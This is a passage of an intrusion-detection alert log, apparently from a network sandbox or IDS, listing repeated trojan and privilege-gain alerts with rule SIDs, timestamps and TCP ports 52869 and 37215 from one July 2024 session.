                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.888773
                      SID:2025132
                      Source Port:58656
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.468386
                      SID:2831300
                      Source Port:48380
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.566903
                      SID:2027339
                      Source Port:51734
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.273031
                      SID:2027339
                      Source Port:42692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.782282
                      SID:2027339
                      Source Port:44674
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.296189
                      SID:2027339
                      Source Port:39776
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.345649
                      SID:2835222
                      Source Port:36392
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.224583
                      SID:2027339
                      Source Port:41930
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.172058
                      SID:2027339
                      Source Port:57592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.560327
                      SID:2027339
                      Source Port:48346
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.988990
                      SID:2835222
                      Source Port:54166
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.011461
                      SID:2835222
                      Source Port:47376
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.657263
                      SID:2829579
                      Source Port:37830
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.661736
                      SID:2027339
                      Source Port:46228
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.432998
                      SID:2831300
                      Source Port:33146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.811975
                      SID:2025132
                      Source Port:32850
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.424850
                      SID:2829579
                      Source Port:55656
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.709098
                      SID:2831300
                      Source Port:44064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.480940
                      SID:2027339
                      Source Port:60866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.524062
                      SID:2831300
                      Source Port:56758
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.123864
                      SID:2027339
                      Source Port:43086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.257476
                      SID:2835222
                      Source Port:38336
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.244983
                      SID:2025132
                      Source Port:46034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.561552
                      SID:2025132
                      Source Port:59504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:12.329747
                      SID:2027339
                      Source Port:47022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.662427
                      SID:2025132
                      Source Port:49196
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.424850
                      SID:2829579
                      Source Port:57040
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.552344
                      SID:2835222
                      Source Port:48396
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.626588
                      SID:2835222
                      Source Port:36134
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.282126
                      SID:2025132
                      Source Port:43732
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.325773
                      SID:2835222
                      Source Port:46180
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.681680
                      SID:2025132
                      Source Port:55716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.575727
                      SID:2027339
                      Source Port:60300
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.160884
                      SID:2027339
                      Source Port:39218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:02.655350
                      SID:2025132
                      Source Port:47420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:13.319028
                      SID:2027339
                      Source Port:55140
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.275898
                      SID:2831300
                      Source Port:35062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.820643
                      SID:2027339
                      Source Port:35474
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.939891
                      SID:2835222
                      Source Port:59260
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.800738
                      SID:2025132
                      Source Port:32814
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.333908
                      SID:2027339
                      Source Port:37722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.993750
                      SID:2027339
                      Source Port:51338
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.960840
                      SID:2027339
                      Source Port:58554
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.412130
                      SID:2835222
                      Source Port:35218
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.994181
                      SID:2025132
                      Source Port:36386
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.752175
                      SID:2027339
                      Source Port:52508
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.627003
                      SID:2025132
                      Source Port:52150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.557906
                      SID:2027339
                      Source Port:41260
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.531088
                      SID:2027339
                      Source Port:60598
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.439166
                      SID:2835222
                      Source Port:43154
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.549791
                      SID:2831300
                      Source Port:52340
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:46.113321
                      SID:2835222
                      Source Port:58390
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.171385
                      SID:2025132
                      Source Port:53602
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:07.406980
                      SID:2027339
                      Source Port:36958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.702462
                      SID:2025132
                      Source Port:57510
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.930490
                      SID:2025132
                      Source Port:36850
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.437584
                      SID:2835222
                      Source Port:44598
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.614128
                      SID:2027339
                      Source Port:34208
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.102064
                      SID:2027339
                      Source Port:45610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.795527
                      SID:2829579
                      Source Port:43994
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.330485
                      SID:2027339
                      Source Port:40262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.045135
                      SID:2027339
                      Source Port:49058
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.238265
                      SID:2835222
                      Source Port:38070
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.106041
                      SID:2829579
                      Source Port:55980
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.101729
                      SID:2829579
                      Source Port:39770
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.348370
                      SID:2027339
                      Source Port:51242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.327822
                      SID:2829579
                      Source Port:41766
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.047547
                      SID:2835222
                      Source Port:55770
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.662338
                      SID:2829579
                      Source Port:38402
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.440953
                      SID:2831300
                      Source Port:39374
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.325013
                      SID:2831300
                      Source Port:40996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:23.161234
                      SID:2831300
                      Source Port:41456
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.241442
                      SID:2025132
                      Source Port:54434
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.354742
                      SID:2829579
                      Source Port:34872
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.933404
                      SID:2027339
                      Source Port:36582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.012420
                      SID:2025132
                      Source Port:59956
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.478783
                      SID:2027339
                      Source Port:34202
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.649436
                      SID:2831300
                      Source Port:58032
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.470683
                      SID:2027339
                      Source Port:36562
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.302433
                      SID:2027339
                      Source Port:42312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.780012
                      SID:2025132
                      Source Port:57900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:38.736451
                      SID:2025132
                      Source Port:40670
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:50.079146
                      SID:2831300
                      Source Port:54916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.297601
                      SID:2027339
                      Source Port:47034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.149453
                      SID:2027339
                      Source Port:50560
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.171917
                      SID:2027339
                      Source Port:59240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.308037
                      SID:2027339
                      Source Port:43552
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.876892
                      SID:2829579
                      Source Port:38732
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:21.790299
                      SID:2027339
                      Source Port:47224
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.235364
                      SID:2025132
                      Source Port:47042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:15.435068
                      SID:2025132
                      Source Port:43386
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.598734
                      SID:2829579
                      Source Port:42370
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.409134
                      SID:2835222
                      Source Port:52362
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:31.730220
                      SID:2027339
                      Source Port:51060
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.667246
                      SID:2025132
                      Source Port:57258
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:17.337182
                      SID:2831300
                      Source Port:41374
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:34.627679
                      SID:2025132
                      Source Port:49360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.334659
                      SID:2831300
                      Source Port:34342
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.788274
                      SID:2829579
                      Source Port:46942
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.594101
                      SID:2027339
                      Source Port:34084
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.540063
                      SID:2027339
                      Source Port:45810
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.047547
                      SID:2829579
                      Source Port:32970
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.876892
                      SID:2835222
                      Source Port:53342
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.967879
                      SID:2831300
                      Source Port:38504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:16.903590
                      SID:2027339
                      Source Port:59238
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.287260
                      SID:2025132
                      Source Port:33168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.427147
                      SID:2829579
                      Source Port:54976
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.829338
                      SID:2835222
                      Source Port:54612
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.489810
                      SID:2027339
                      Source Port:52222
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.993302
                      SID:2027339
                      Source Port:39310
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:43.392497
                      SID:2025132
                      Source Port:47024
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.416560
                      SID:2829579
                      Source Port:56478
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.241970
                      SID:2025132
                      Source Port:56778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:11.279918
                      SID:2025132
                      Source Port:36802
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.088778
                      SID:2829579
                      Source Port:48960
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.441698
                      SID:2027339
                      Source Port:39742
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.607616
                      SID:2027339
                      Source Port:36216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.458215
                      SID:2025132
                      Source Port:51276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:15.418646
                      SID:2027339
                      Source Port:36720
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.005197
                      SID:2027339
                      Source Port:57222
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.767909
                      SID:2027339
                      Source Port:53870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.223853
                      SID:2025132
                      Source Port:38068
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:09.712957
                      SID:2025132
                      Source Port:43334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.857328
                      SID:2835222
                      Source Port:49320
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.791998
                      SID:2027339
                      Source Port:38314
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.191841
                      SID:2025132
                      Source Port:59974
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.471230
                      SID:2027339
                      Source Port:53956
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.468494
                      SID:2831300
                      Source Port:43858
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.802006
                      SID:2027339
                      Source Port:38318
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.677656
                      SID:2835222
                      Source Port:36154
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.325773
                      SID:2835222
                      Source Port:42214
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.339081
                      SID:2025132
                      Source Port:36148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.080968
                      SID:2831300
                      Source Port:51134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:27.950361
                      SID:2027339
                      Source Port:35130
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.219605
                      SID:2025132
                      Source Port:42298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:37.315997
                      SID:2835222
                      Source Port:60908
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:50.419958
                      SID:2027339
                      Source Port:50060
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.532921
                      SID:2835222
                      Source Port:48872
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.442743
                      SID:2027339
                      Source Port:53022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.664505
                      SID:2027339
                      Source Port:45186
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.828884
                      SID:2829579
                      Source Port:57716
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.277885
                      SID:2831300
                      Source Port:53212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.653253
                      SID:2835222
                      Source Port:43338
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.359662
                      SID:2829579
                      Source Port:40352
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.106701
                      SID:2027339
                      Source Port:51280
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.159544
                      SID:2027339
                      Source Port:43094
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.407056
                      SID:2027339
                      Source Port:45708
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.501247
                      SID:2835222
                      Source Port:42870
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.037207
                      SID:2025132
                      Source Port:49594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.127633
                      SID:2025132
                      Source Port:32928
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.533759
                      SID:2835222
                      Source Port:41510
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.220682
                      SID:2829579
                      Source Port:35462
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.163232
                      SID:2027339
                      Source Port:57570
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.120793
                      SID:2835222
                      Source Port:53676
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.834038
                      SID:2027339
                      Source Port:60472
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.324403
                      SID:2027339
                      Source Port:50108
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.063003
                      SID:2025132
                      Source Port:38680
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.128245
                      SID:2831300
                      Source Port:48040
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.592985
                      SID:2025132
                      Source Port:50576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.430020
                      SID:2829579
                      Source Port:49618
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.526744
                      SID:2027339
                      Source Port:48702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.708489
                      SID:2027339
                      Source Port:54226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.148116
                      SID:2831300
                      Source Port:52190
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:16.718290
                      SID:2027339
                      Source Port:36944
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:29.745087
                      SID:2027339
                      Source Port:56642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.830570
                      SID:2835222
                      Source Port:56092
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.498027
                      SID:2835222
                      Source Port:55076
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.974933
                      SID:2027339
                      Source Port:36530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:56.793781
                      SID:2027339
                      Source Port:42486
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.352326
                      SID:2025132
                      Source Port:55860
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:34.155225
                      SID:2831300
                      Source Port:35032
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:46.718788
                      SID:2025132
                      Source Port:53688
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.338927
                      SID:2835222
                      Source Port:43252
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.022964
                      SID:2829579
                      Source Port:52448
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.137269
                      SID:2829579
                      Source Port:47056
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.844842
                      SID:2025132
                      Source Port:40892
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.446118
                      SID:2027339
                      Source Port:58562
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.197388
                      SID:2831300
                      Source Port:50306
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:12.663367
                      SID:2025132
                      Source Port:58860
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.449068
                      SID:2027339
                      Source Port:46224
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.250185
                      SID:2025132
